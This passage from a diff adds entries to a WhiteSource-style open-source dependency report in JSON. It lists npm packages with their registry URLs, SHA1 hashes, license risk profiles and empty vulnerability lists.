"https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/bc442194-ba18-43e8-aff3-5d78c07b725e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8e6892c9-8349-4f15-a9db-aaf0f788b435", + "keyId": 27297339, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/node-emoji/-/node-emoji-1.10.0.tgz", + "homePage": "https://github.com/omnidan/node-emoji#readme", + "genericPackageIndex": "https://www.npmjs.org/package/node-emoji" + }, + "matchType": "SHA1", + "sha1": "8886abd25d9c7bb61802a658523d1f8d2a89b2da", + "name": "node-emoji-1.10.0.tgz", + "artifactId": "node-emoji-1.10.0.tgz", + "version": "1.10.0", + "groupId": "node-emoji", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/68ac4716-07d3-45fa-a5df-15ba71b2fd20" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2cf3c586-e891-43e6-845a-89da83d5fc2a", + "keyId": 28432207, + "type": "SOURCE_LIBRARY", + "languages": "JavaScript", + "references": { + "url": "https://github.com/DataDog/dd-trace-js.git", + "homePage": "https://docs.datadoghq.com/tracing/", + "downloadLink": "https://github.com/DataDog/dd-trace-js/zipball/v0.15.2" + }, + "matchType": "SOURCE_FILE", + "sha1": "a88563f7623bef0fe78ec4bd950db09c96ae54b6", + "name": "dd-trace-js-v0.15.2", + "artifactId": "dd-trace-js", + "version": "v0.15.2", + "groupId": "DataDog", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "License File", + "reference": "License File (package.json)" + }, + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "License File", + "reference": "License File (LICENSE-3rdparty.csv)" + }, + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "License File", + "reference": "License File (LICENSE-3rdparty.csv)" + }, + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "License File", + "reference": "License File (LICENSE-3rdparty.csv)" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0e978011-968d-40f6-bc20-d0359fb6ebd9", + "keyId": 26955434, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/esprima/-/esprima-2.7.3.tgz", + "homePage": "http://esprima.org", + "genericPackageIndex": "https://www.npmjs.org/package/esprima" + }, + "matchType": "SHA1", + "sha1": "96e3b70d5779f6ad49cd032673d1c312767ba581", + "name": "esprima-2.7.3.tgz", + "artifactId": "esprima-2.7.3.tgz", + "version": "2.7.3", + "groupId": "esprima", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/esprima" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "61c2beb4-1194-42db-ba71-3f39372b1ed6", + "keyId": 27684313, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-modules-local-by-default/-/postcss-modules-local-by-default-3.0.2.tgz", + "homePage": "https://github.com/css-modules/postcss-modules-local-by-default#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-modules-local-by-default" + }, + "matchType": "SHA1", + "sha1": "e8a6561be914aaf3c052876377524ca90dbb7915", + "name": "postcss-modules-local-by-default-3.0.2.tgz", + "artifactId": "postcss-modules-local-by-default-3.0.2.tgz", + "version": "3.0.2", + "groupId": "postcss-modules-local-by-default", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/e1469b08-609a-49f6-9ff5-5883645f089b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0db843cc-1220-4c9b-bf89-02078b4f5680", + "keyId": 26954662, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/exit-hook/-/exit-hook-1.1.1.tgz", + "homePage": "https://github.com/sindresorhus/exit-hook", + "genericPackageIndex": "https://www.npmjs.org/package/exit-hook" + }, + "matchType": "SHA1", + "sha1": "f05ca233b48c05d54fff07765df8507e95c02ff8", + "name": "exit-hook-1.1.1.tgz", + "artifactId": "exit-hook-1.1.1.tgz", + "version": "1.1.1", + "groupId": "exit-hook", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://github.com/sindresorhus/exit-hook/blob/v1.1.1/package.json" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "211c450d-9317-4e94-9044-f64973564c5f", + "keyId": 28432180, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/echo-cli/-/echo-cli-1.0.8.tgz", + "homePage": "https://github.com/iamakulov/echo-cli#readme", + "genericPackageIndex": "https://www.npmjs.org/package/echo-cli" + }, + "matchType": "SHA1", + "sha1": "70a45b87f96db08b4543c9895bf2ae82e6910988", + "name": "echo-cli-1.0.8.tgz", + "artifactId": "echo-cli-1.0.8.tgz", + "version": "1.0.8", + "groupId": "echo-cli", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/echo-cli" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ac046152-e720-4fc5-a94e-4196bbce7600", + "keyId": 26948746, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/stack-trace/-/stack-trace-0.0.10.tgz", + "homePage": "https://github.com/felixge/node-stack-trace", + "genericPackageIndex": "https://www.npmjs.org/package/stack-trace" + }, + "matchType": "SHA1", + "sha1": "547c70b347e8d32b4e108ea1a2a159e5fdde19c0", + "name": "stack-trace-0.0.10.tgz", + "artifactId": "stack-trace-0.0.10.tgz", + "version": "0.0.10", + "groupId": "stack-trace", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/9a491d80-c909-4577-92a4-0277891cf54b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e1531380-a191-488b-83f7-ba10fa4338ab", + "keyId": 26955603, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/listr-verbose-renderer/-/listr-verbose-renderer-0.4.1.tgz", + "homePage": "https://github.com/samverschueren/listr-verbose-renderer#readme", + "genericPackageIndex": "https://www.npmjs.org/package/listr-verbose-renderer" + }, + "matchType": "SHA1", + "sha1": "8206f4cf6d52ddc5827e5fd14989e0e965933a35", + "name": "listr-verbose-renderer-0.4.1.tgz", + "artifactId": "listr-verbose-renderer-0.4.1.tgz", + "version": "0.4.1", + "groupId": "listr-verbose-renderer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/listr-verbose-renderer" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4393a5d9-60b2-40a2-a7b9-8383db12d9a3", + "keyId": 27434621, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/compressible/-/compressible-2.0.17.tgz", + "homePage": "https://github.com/jshttp/compressible#readme", + "genericPackageIndex": "https://www.npmjs.org/package/compressible" + }, + "matchType": "SHA1", + "sha1": "6e8c108a16ad58384a977f3a482ca20bff2f38c1", + "name": "compressible-2.0.17.tgz", + "artifactId": "compressible-2.0.17.tgz", + "version": "2.0.17", + "groupId": "compressible", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/compressible" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d4176008-1458-4cc5-b35d-76a3f5249c8f", + "keyId": 27557105, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/glob-to-regexp/-/glob-to-regexp-0.4.1.tgz", + "homePage": "https://github.com/fitzgen/glob-to-regexp#readme", + "genericPackageIndex": "https://www.npmjs.org/package/glob-to-regexp" + }, + "matchType": "SHA1", + "sha1": "c75297087c851b9a578bd217dd59a92f59fe546e", + "name": "glob-to-regexp-0.4.1.tgz", + "artifactId": "glob-to-regexp-0.4.1.tgz", + "version": "0.4.1", + "groupId": "glob-to-regexp", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/glob-to-regexp/v/0.4.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e2d44bb9-b066-4dd0-a315-52275c90f990", + "keyId": 27034064, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/fs-extra/-/fs-extra-3.0.1.tgz", + "homePage": "https://github.com/jprichardson/node-fs-extra", + "genericPackageIndex": "https://www.npmjs.org/package/fs-extra" + }, + "matchType": "SHA1", + "sha1": "3794f378c58b342ea7dbbb23095109c4b3b62291", + "name": "fs-extra-3.0.1.tgz", + "artifactId": "fs-extra-3.0.1.tgz", + "version": "3.0.1", + "groupId": "fs-extra", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/fs-extra" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d34a1c9e-d612-4cf6-9cf0-682f4f7aef94", + "keyId": 27505120, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/babel-loader/-/babel-loader-8.0.6.tgz", + "homePage": "https://github.com/babel/babel-loader", + "genericPackageIndex": "https://www.npmjs.org/package/babel-loader" + }, + "matchType": "SHA1", + "sha1": "e33bdb6f362b03f4bb141a0c21ab87c501b70dfb", + "name": "babel-loader-8.0.6.tgz", + "artifactId": "babel-loader-8.0.6.tgz", + "version": "8.0.6", + "groupId": "babel-loader", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/babel-loader" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "478b90c1-a80f-427a-8b34-794081a03fed", + "keyId": 27824789, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/url-join/-/url-join-4.0.1.tgz", + "homePage": "https://github.com/jfromaniello/url-join#readme", + "genericPackageIndex": "https://www.npmjs.org/package/url-join" + }, + "matchType": "SHA1", + "sha1": "b642e21a2646808ffa178c4c5fda39844e12cde7", + "name": "url-join-4.0.1.tgz", + "artifactId": "url-join-4.0.1.tgz", + "version": "4.0.1", + "groupId": "url-join", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/afded104-ef91-445b-9c82-9a96173bc28d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "38b6c3e5-5928-4e29-a969-4268e837de75", + "keyId": 27531469, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/env-paths/-/env-paths-2.2.0.tgz", + "homePage": "https://github.com/sindresorhus/env-paths#readme", + "genericPackageIndex": "https://www.npmjs.org/package/env-paths" + }, + "matchType": "SHA1", + "sha1": "cdca557dc009152917d6166e2febe1f039685e43", + "name": "env-paths-2.2.0.tgz", + "artifactId": "env-paths-2.2.0.tgz", + "version": "2.2.0", + "groupId": "env-paths", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/env-paths/v/2.2.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e5fb065b-55bf-4d2a-b18b-5654e0e4bd12", + "keyId": 28078666, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-modules-commonjs/-/plugin-transform-modules-commonjs-7.6.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-modules-commonjs" + }, + "matchType": "SHA1", + "sha1": "39dfe957de4420445f1fcf88b68a2e4aa4515486", + "name": "plugin-transform-modules-commonjs-7.6.0.tgz", + "artifactId": "plugin-transform-modules-commonjs-7.6.0.tgz", + "version": "7.6.0", + "groupId": "@babel/plugin-transform-modules-commonjs", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-transform-modules-commonjs" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "34fbcb29-72da-4c49-8561-45f7a86b989b", + "keyId": 27961618, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/file-loader/-/file-loader-4.2.0.tgz", + "homePage": "https://github.com/webpack-contrib/file-loader", + "genericPackageIndex": "https://www.npmjs.org/package/file-loader" + }, + "matchType": "SHA1", + "sha1": "5fb124d2369d7075d70a9a5abecd12e60a95215e", + "name": "file-loader-4.2.0.tgz", + "artifactId": "file-loader-4.2.0.tgz", + "version": "4.2.0", + "groupId": "file-loader", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/file-loader" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "33e8d293-b308-47f2-ac61-c340d41c6ff0", + "keyId": 27100443, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-logical/-/postcss-logical-3.0.0.tgz", + "homePage": "https://github.com/jonathantneal/postcss-logical#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-logical" + }, + "matchType": "SHA1", + "sha1": "2495d0f8b82e9f262725f75f9401b34e7b45d5b5", + "name": "postcss-logical-3.0.0.tgz", + "artifactId": "postcss-logical-3.0.0.tgz", + "version": "3.0.0", + "groupId": "postcss-logical", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/39206028-0213-4123-9c14-ce64fb727d59" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d1272428-893b-4c17-9003-5c4dbc134131", + "keyId": 27935437, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/jest-worker/-/jest-worker-24.9.0.tgz", + "homePage": "https://github.com/facebook/jest#readme", + "genericPackageIndex": "https://www.npmjs.org/package/jest-worker" + }, + "matchType": "SHA1", + "sha1": "5dbfdb5b2d322e98567898238a9697bcce67b3e5", + "name": "jest-worker-24.9.0.tgz", + "artifactId": "jest-worker-24.9.0.tgz", + "version": "24.9.0", + "groupId": "jest-worker", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/995436c8-a242-420b-9bde-8cc30e4611dd" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "69538a17-c164-429e-a517-8a4a560f68bc", + "keyId": 26961821, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cardinal/-/cardinal-1.0.0.tgz", + "homePage": "https://github.com/thlorenz/cardinal#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cardinal" + }, + "matchType": "SHA1", + "sha1": "50e21c1b0aa37729f9377def196b5a9cec932ee9", + "name": "cardinal-1.0.0.tgz", + "artifactId": "cardinal-1.0.0.tgz", + "version": "1.0.0", + "groupId": "cardinal", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/cardinal" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "258b37d1-d38c-4b95-a093-486aead3393d", + "keyId": 27100410, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-flexbugs-fixes/-/postcss-flexbugs-fixes-4.1.0.tgz", + "homePage": "https://github.com/luisrudge/postcss-flexbugs-fixes#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-flexbugs-fixes" + }, + "matchType": "SHA1", + "sha1": "e094a9df1783e2200b7b19f875dcad3b3aff8b20", + "name": "postcss-flexbugs-fixes-4.1.0.tgz", + "artifactId": "postcss-flexbugs-fixes-4.1.0.tgz", + "version": "4.1.0", + "groupId": "postcss-flexbugs-fixes", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-flexbugs-fixes" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "70d717b2-5960-4b2d-9a95-a1eb7c9a4396", + "keyId": 27100359, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-place/-/postcss-place-4.0.1.tgz", + "homePage": "https://github.com/jonathantneal/postcss-place#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-place" + }, + "matchType": "SHA1", + "sha1": "e9f39d33d2dc584e46ee1db45adb77ca9d1dcc62", + "name": "postcss-place-4.0.1.tgz", + "artifactId": "postcss-place-4.0.1.tgz", + "version": "4.0.1", + "groupId": "postcss-place", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/edc54a68-d5b2-4e6f-a0d9-7922c836f6f2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2085748b-c264-4b40-8a5d-fcd0a2597884", + "keyId": 26961710, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cookie/-/cookie-0.3.1.tgz", + "homePage": "https://github.com/jshttp/cookie", + "genericPackageIndex": "https://www.npmjs.org/package/cookie" + }, + "matchType": "SHA1", + "sha1": "e7e0a1f9ef43b4c8ba925c5c5a96e806d16873bb", + "name": "cookie-0.3.1.tgz", + "artifactId": "cookie-0.3.1.tgz", + "version": "0.3.1", + "groupId": "cookie", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/280b3938-051c-41b8-b1ca-42282346c848" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0f698a88-e883-47c1-a1b6-e975816982b8", + "keyId": 27253221, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-modules-scope/-/postcss-modules-scope-2.1.0.tgz", + "homePage": "https://github.com/css-modules/postcss-modules-scope", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-modules-scope" + }, + "matchType": "SHA1", + "sha1": "ad3f5bf7856114f6fcab901b0502e2a2bc39d4eb", + "name": "postcss-modules-scope-2.1.0.tgz", + "artifactId": "postcss-modules-scope-2.1.0.tgz", + "version": "2.1.0", + "groupId": "postcss-modules-scope", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c0a97d22-7dba-4549-ace6-198d8180fcbd" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8ac318ae-60a3-4183-8921-172d18c28432", + "keyId": 27898243, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/base64-js/-/base64-js-1.3.1.tgz", + "homePage": "https://github.com/beatgammit/base64-js", + "genericPackageIndex": "https://www.npmjs.org/package/base64-js" + }, + "matchType": "SHA1", + "sha1": "58ece8cb75dd07e71ed08c736abc5fac4dbf8df1", + "name": "base64-js-1.3.1.tgz", + "artifactId": "base64-js-1.3.1.tgz", + "version": "1.3.1", + "groupId": "base64-js", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/base64-js/v/1.3.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ca925849-96f2-40da-8154-955e7045f17d", + "keyId": 27909013, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-value-parser/-/postcss-value-parser-4.0.2.tgz", + "homePage": "https://github.com/TrySound/postcss-value-parser", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-value-parser" + }, + "matchType": "SHA1", + "sha1": "482282c09a42706d1fc9a069b73f44ec08391dc9", + "name": "postcss-value-parser-4.0.2.tgz", + "artifactId": "postcss-value-parser-4.0.2.tgz", + "version": "4.0.2", + "groupId": "postcss-value-parser", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/6a64b5ed-7878-4848-b9f8-1746d96a235d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "fcd18eeb-e0ae-46b5-8641-d2d18c1a3d67", + "keyId": 27089960, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/yargs/-/yargs-12.0.5.tgz", + "homePage": "https://yargs.js.org/", + "genericPackageIndex": "https://www.npmjs.org/package/yargs" + }, + "matchType": "SHA1", + "sha1": "05f5997b609647b64f66b81e3b4b10a368e7ad13", + "name": "yargs-12.0.5.tgz", + "artifactId": "yargs-12.0.5.tgz", + "version": "12.0.5", + "groupId": "yargs", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/750873ca-f475-40ac-be44-41d55136a9ae" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8d66e2a0-7051-40bf-8d68-e0af32789145", + "keyId": 27064198, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/parent-module/-/parent-module-0.1.0.tgz", + "homePage": "https://github.com/sindresorhus/parent-module", + "genericPackageIndex": "https://www.npmjs.org/package/parent-module" + }, + "matchType": "SHA1", + "sha1": "b5292863a1e8c476ecf857e7d75c98920b24b8a6", + "name": "parent-module-0.1.0.tgz", + "artifactId": "parent-module-0.1.0.tgz", + "version": "0.1.0", + "groupId": "parent-module", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/78264c3d-873c-43c3-9cc6-9facae449f3d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a2a7efa8-9820-4e7a-9866-f01a28576aa2", + "keyId": 28432187, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui/-/honeyui-1.3.0.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/core#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui" + }, + "matchType": "SHA1", + "sha1": "f0e4e463ed1c16208634fb5daf2ed154a17f2b19", + "name": "honeyui-1.3.0.tgz", + "artifactId": "honeyui-1.3.0.tgz", + "version": "1.3.0", + "groupId": "@test/honeyui", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a8b0c6d3-1d6f-44ca-a5bb-e870bd533683", + "keyId": 26967955, + "type": 